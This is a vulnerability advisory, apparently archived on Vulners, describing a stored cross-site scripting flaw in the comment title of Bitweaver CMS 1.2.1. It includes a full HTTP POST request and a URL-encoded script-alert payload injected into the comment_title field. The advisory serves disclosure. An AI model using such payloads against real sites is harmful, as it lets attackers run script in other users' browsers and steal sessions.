Vulners
Lucene search
bitweaver_1.2.1_XSS.txt
`Bitweaver CMS 1.2.1 User Comment Title Cross-Site Scripting Vulnerability
####################################
Information of Software:
Software: Bitweaver CMS 1.2.1
Site: http://www.bitweaver.org
Description of software: bitweaver is continually improving it's stability,
usability, flexibility and power. The rate at which this is happening is quite
astonishing and bitweaver has come a long way since it's birth, just over a year ago.
####################################
Bug:
Bitweaver contains a flaw that allows a remote cross site scripting attack.
The vulnerability is found in the title of registed user comment page and the
user can modify the function POST and insert the XSS code
- HTTP POST request -
http://[target]/[patch]/read.php?article_id=7#editcomments
POST /articles/read.php?article_id=7 HTTP/1.1
Host: http://[target]
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; it-IT; rv:1.7.12) Gecko/20050919 Firefox/1.0.7
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: it,it-it;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Referer: http://[target]/articles/read.php?article_id=7
Cookie: mod_usertrack=82.56.164.250.1141558144377994; BWSESSION=v5a6krvki42h0puv48dc5coki0; tz_offset=3600; tiki-user-bitweaver=616706c4d6f7bdf68b30893f860cbb2b
Content-Type: application/x-www-form-urlencoded
Content-Length: 265
tk=c67481b438f7be3da147&comments_maxComments=10&comments_style=threaded&comments_sort_mode=commentDate_desc&post_comment_reply_id=&post_comment_id=&comment_title=hacking&comment_data=[your_name_logged]&post_comment_submit=Post
but we can modify the request POST in this way:
tk=c67481b438f7be3da147&comments_maxComments=10&comments_style=threaded&comments_sort_mode=commentDate_desc&post_comment_reply_id=&post_comment_id=&comment_title=%3Cscript%3Ealert%28%22lol%22%29%3B%3C%2Fscript%3E&comment_data=[your_name_logged]&post_comment_submit=Post
---------------------------------------------------------
Example:
For this exploit you must be registred at the site.
you can insert in the text post an XSS code or you can modify the request in this way:
tk=c67481b438f7be3da147&comments_maxComments=10&comments_style=threaded&comments_sort_mode=commentDate_desc&post_comment_reply_id=&post_comment_id=&comment_title=[XSS]&comment_data=[your_name_logged]&post_comment_submit=Post
####################################
Credit:
Author: Kiki
e-mail: [email protected]
web page: http://kiki91.altervista.org
http://blackzero.netsons.org
####################################`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
08 Mar 2006 00:00Current
7.4High risk
Vulners AI Score7.4